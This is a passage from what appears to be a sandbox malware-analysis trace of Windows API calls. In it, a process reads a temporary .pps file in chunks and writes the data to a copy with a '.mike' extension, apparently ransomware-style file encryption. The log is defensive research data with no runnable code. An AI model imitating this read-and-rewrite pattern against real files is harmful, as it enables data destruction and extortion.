lpOverlapped=0x0 | out: lpBuffer=0x213d76c*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.464] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike", lpFilePart=0x0) returned 0x4c [0147.464] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\thzmiqt0q-s9l18rwl.pps.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.465] GetFileType (hFile=0x1d4) returned 0x1 [0147.465] GetFileType (hFile=0x1d4) returned 0x1 [0147.465] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0147.466] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", lpFilePart=0x0) returned 0x47 [0147.466] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\thzmiqt0q-s9l18rwl.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.466] GetFileType (hFile=0x1d4) returned 0x1 [0147.466] GetFileType (hFile=0x1d4) returned 0x1 [0147.466] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0147.467] ReadFile (in: hFile=0x1d4, lpBuffer=0x214a75c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x214a75c*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.468] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike", lpFilePart=0x0) returned 0x4c [0147.468] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\thzmiqt0q-s9l18rwl.pps.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.468] GetFileType (hFile=0x1d4) returned 0x1 [0147.468] GetFileType (hFile=0x1d4) returned 0x1 [0147.468] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2a20 [0147.469] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", lpFilePart=0x0) returned 0x47 [0147.469] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\thzmiqt0q-s9l18rwl.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.470] GetFileType (hFile=0x1d4) returned 0x1 [0147.470] GetFileType (hFile=0x1d4) returned 0x1 [0147.470] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x5000 [0147.470] ReadFile (in: hFile=0x1d4, lpBuffer=0x215774c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x215774c*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.471] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike", lpFilePart=0x0) returned 0x4c [0147.472] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\thzmiqt0q-s9l18rwl.pps.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.472] GetFileType (hFile=0x1d4) returned 0x1 [0147.472] GetFileType (hFile=0x1d4) returned 0x1 [0147.472] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x5220 [0147.473] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", lpFilePart=0x0) returned 0x47 [0147.473] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\thzmiqt0q-s9l18rwl.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.473] GetFileType (hFile=0x1d4) returned 0x1 [0147.473] GetFileType (hFile=0x1d4) returned 0x1 [0147.473] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=30720, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x7800 [0147.474] ReadFile (in: hFile=0x1d4, lpBuffer=0x216473c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x216473c*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.475] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike", lpFilePart=0x0) returned 0x4c [0147.475] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\thzmiqt0q-s9l18rwl.pps.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.475] GetFileType (hFile=0x1d4) returned 0x1 [0147.475] GetFileType (hFile=0x1d4) returned 0x1 [0147.475] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x7a20 [0147.476] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", lpFilePart=0x0) returned 0x47 [0147.476] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\thzmiqt0q-s9l18rwl.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.477] GetFileType (hFile=0x1d4) returned 0x1 [0147.477] GetFileType (hFile=0x1d4) returned 0x1 [0147.477] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=40960, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xa000 [0147.477] ReadFile (in: hFile=0x1d4, lpBuffer=0x217172c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x217172c*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.478] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike", lpFilePart=0x0) returned 0x4c [0147.478] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\thzmiqt0q-s9l18rwl.pps.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.479] GetFileType (hFile=0x1d4) returned 0x1 [0147.479] GetFileType (hFile=0x1d4) returned 0x1 [0147.479] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0xa220 [0147.480] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", lpFilePart=0x0) returned 0x47 [0147.480] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\thzmiqt0q-s9l18rwl.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.480] GetFileType (hFile=0x1d4) returned 0x1 [0147.480] GetFileType (hFile=0x1d4) returned 0x1 [0147.480] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=51200, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xc800 [0147.481] ReadFile (in: hFile=0x1d4, lpBuffer=0x217e71c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x217e71c*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.481] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike", lpFilePart=0x0) returned 0x4c [0147.481] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\thzmiqt0q-s9l18rwl.pps.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.482] GetFileType (hFile=0x1d4) returned 0x1 [0147.482] GetFileType (hFile=0x1d4) returned 0x1 [0147.482] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0xca20 [0147.483] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", lpFilePart=0x0) returned 0x47 [0147.483] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\thzmiqt0q-s9l18rwl.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.483] GetFileType (hFile=0x1d4) returned 0x1 [0147.483] GetFileType (hFile=0x1d4) returned 0x1 [0147.483] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=61440, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xf000 [0147.484] ReadFile (in: hFile=0x1d4, lpBuffer=0x218b70c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x218b70c*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.484] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike", lpFilePart=0x0) returned 0x4c [0147.485] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\thzmiqt0q-s9l18rwl.pps.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.485] GetFileType (hFile=0x1d4) returned 0x1 [0147.486] GetFileType (hFile=0x1d4) returned 0x1 [0147.486] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0xf220 [0147.486] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", lpFilePart=0x0) returned 0x47 [0147.486] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\thzmiqt0q-s9l18rwl.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.487] GetFileType (hFile=0x1d4) returned 0x1 [0147.487] GetFileType (hFile=0x1d4) returned 0x1 [0147.487] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=71680, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x11800 [0147.487] ReadFile (in: hFile=0x1d4, lpBuffer=0x21986fc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21986fc*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.488] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike", lpFilePart=0x0) returned 0x4c [0147.488] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\thzmiqt0q-s9l18rwl.pps.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.489] GetFileType (hFile=0x1d4) returned 0x1 [0147.489] GetFileType (hFile=0x1d4) returned 0x1 [0147.489] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x11a20 [0147.489] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", lpFilePart=0x0) returned 0x47 [0147.490] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\thzmiqt0q-s9l18rwl.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.490] GetFileType (hFile=0x1d4) returned 0x1 [0147.490] GetFileType (hFile=0x1d4) returned 0x1 [0147.490] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=81920, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x14000 [0147.491] ReadFile (in: hFile=0x1d4, lpBuffer=0x21a56ec, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21a56ec*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.491] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike", lpFilePart=0x0) returned 0x4c [0147.491] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\thzmiqt0q-s9l18rwl.pps.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.492] GetFileType (hFile=0x1d4) returned 0x1 [0147.492] GetFileType (hFile=0x1d4) returned 0x1 [0147.492] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x14220 [0147.493] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", lpFilePart=0x0) returned 0x47 [0147.493] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\thzmiqt0q-s9l18rwl.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.493] GetFileType (hFile=0x1d4) returned 0x1 [0147.493] GetFileType (hFile=0x1d4) returned 0x1 [0147.493] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=92160, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x16800 [0147.494] ReadFile (in: hFile=0x1d4, lpBuffer=0x21b26dc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21b26dc*, lpNumberOfBytesRead=0x2af080*=0x124f, lpOverlapped=0x0) returned 1 [0147.494] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike", lpFilePart=0x0) returned 0x4c [0147.494] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\thzmiqt0q-s9l18rwl.pps.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.495] GetFileType (hFile=0x1d4) returned 0x1 [0147.495] GetFileType (hFile=0x1d4) returned 0x1 [0147.495] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x16a20 [0147.495] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike", lpFilePart=0x0) returned 0x4c [0147.496] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\thzmiqt0q-s9l18rwl.pps.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.496] GetFileType (hFile=0x1d4) returned 0x1 [0147.496] GetFileType (hFile=0x1d4) returned 0x1 [0147.497] WriteFile (in: hFile=0x1d4, lpBuffer=0x21be598*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21be598*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0147.498] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", lpFilePart=0x0) returned 0x47 [0147.498] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike", lpFilePart=0x0) returned 0x4c [0147.498] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\thzmiqt0q-s9l18rwl.pps.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x212d3c60, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x212d3c60, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x2131ff20, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x17c70)) returned 1 [0147.498] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", nBufferLength=0x105, 